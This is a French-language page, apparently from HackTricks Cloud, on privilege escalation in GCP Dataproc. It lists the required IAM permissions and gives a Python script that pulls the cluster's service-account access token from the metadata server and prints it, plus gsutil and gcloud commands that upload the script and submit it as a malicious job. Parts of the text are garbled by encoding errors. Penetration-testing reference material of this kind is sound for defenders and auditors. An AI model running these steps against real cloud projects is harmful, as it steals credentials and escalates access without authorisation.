GCP Dataproc Privilege Escalation
Tip
Apprenez & pratiquez AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Soutenez HackTricks
- Consultez les subscription plans!
- Rejoignez le đŹ Discord group ou le telegram group ou suivez-nous sur Twitter đŠ @hacktricks_live.
- Partagez des hacking tricks en soumettant des PRs aux HackTricks et HackTricks Cloud github repos.
Dataproc
dataproc.clusters.get, dataproc.clusters.use, dataproc.jobs.create, dataproc.jobs.get, dataproc.jobs.list, storage.objects.create, storage.objects.get
Je nâai pas pu obtenir de reverse shell avec cette mĂ©thode, cependant il est possible de leak le SA token depuis le metadata endpoint en utilisant la mĂ©thode dĂ©crite ci-dessous.
Steps to exploit
-
Placez le script du job sur le GCP Bucket
-
Soumettez un job Ă un Dataproc cluster.
-
Utilisez le job pour accéder au metadata server.
-
Leak le service account token utilisé par le cluster.
Script Python pour récupérer le SA token depuis le metadata server
```python import requestsmetadata_url = âhttp://metadata/computeMetadata/v1/instance/service-accounts/default/tokenâ headers = {âMetadata-Flavorâ: âGoogleâ}
def fetch_metadata_token(): try: response = requests.get(metadata_url, headers=headers, timeout=5) response.raise_for_status() token = response.json().get(âaccess_tokenâ, ââ) print(fâLeaked Token: {token}â) return token except Exception as e: print(fâError fetching metadata token: {e}â) return None
if name == âmainâ: fetch_metadata_token()
</details>
<details><summary>Soumettre un job malveillant au cluster Dataproc</summary>
```bash
# Copy the script to the storage bucket
gsutil cp <python-script> gs://<bucket-name>/<python-script>
# Submit the malicious job
gcloud dataproc jobs submit pyspark gs://<bucket-name>/<python-script> \
--cluster=<cluster-name> \
--region=<region>
Tip
Apprenez & pratiquez AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Soutenez HackTricks
- Consultez les subscription plans!
- Rejoignez le đŹ Discord group ou le telegram group ou suivez-nous sur Twitter đŠ @hacktricks_live.
- Partagez des hacking tricks en soumettant des PRs aux HackTricks et HackTricks Cloud github repos.
HackTricks Cloud

